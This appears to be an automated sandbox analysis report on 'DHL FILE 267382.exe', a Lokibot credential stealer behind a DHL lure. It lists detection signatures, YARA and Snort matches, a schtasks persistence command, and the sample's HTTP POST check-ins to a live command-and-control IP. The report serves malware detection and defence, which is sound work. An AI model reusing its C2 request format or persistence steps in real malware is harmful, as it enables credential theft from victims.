Loading ...

Play interactive tourEdit tour

Analysis Report DHL FILE 267382.exe

Overview

General Information

Sample Name:DHL FILE 267382.exe
Analysis ID:299736
MD5:72fb9a400177dfd9b010ed127537fe3e
SHA1:27ed71ca36a0a51c746a033d86e664a0fc7615f5
SHA256:0969f9b67bae5ccaa7d4b2fd6fa97a6f6accbc890711f6f3f9361302d9e832c4
Tags:DHLexeLoki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • DHL FILE 267382.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\DHL FILE 267382.exe' MD5: 72FB9A400177DFD9B010ED127537FE3E)
    • schtasks.exe (PID: 6664 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
      • 0x12d347:$des3: 68 03 66 00 00
      • 0x131738:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
      • 0x131804:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
      00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.DHL FILE 267382.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          3.2.DHL FILE 267382.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            3.2.DHL FILE 267382.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              3.2.DHL FILE 267382.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              3.2.DHL FILE 267382.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x12fff:$des3: 68 03 66 00 00
              • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 4 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Scheduled temp file as task from temp locationShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL FILE 267382.exe' , ParentImage: C:\Users\user\Desktop\DHL FILE 267382.exe, ParentProcessId: 6600, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', ProcessId: 6664

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeReversingLabs: Detection: 22%
              Multi AV Scanner detection for submitted fileShow sources
              Source: DHL FILE 267382.exeReversingLabs: Detection: 22%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: DHL FILE 267382.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 195.69.140.147:80
              Source: Joe Sandbox ViewIP Address: 195.69.140.147 195.69.140.147
              Source: Joe Sandbox ViewASN Name: XSGGE XSGGE
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 165Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
              Source: unknownHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Oct 2020 06:34:06 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
              Source: DHL FILE 267382.exe, 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: DHL FILE 267382.exe, DHL FILE 267382.exe, 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179C1240_2_0179C124
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179E5700_2_0179E570
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179E5600_2_0179E560
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040549C3_2_0040549C
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_004029D43_2_004029D4
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: String function: 00405B6F appears 42 times
              Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236119428.0000000006300000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.237012698.0000000006CD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000003.00000002.243530574.000000000071C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exeBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: DHL FILE 267382.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: wmiRSwSoPk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.spyw.evad.winEXE@6/5@0/1
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4DA9.tmpJump to behavior
              Source: DHL FILE 267382.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: DHL FILE 267382.exeReversingLabs: Detection: 22%
              Source: DHL FILE 267382.exeString found in binary or memory: 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
              Source: DHL FILE 267382.exeString found in binary or memory: 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile read: C:\Users\user\Desktop\DHL FILE 267382.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe 'C:\Users\user\Desktop\DHL FILE 267382.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: DHL FILE 267382.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: DHL FILE 267382.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_070B18E5 push FFFFFF8Bh; iretd 0_2_070B18E7
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
              Source: initial sampleStatic PE information: section name: .text entropy: 7.59320889202
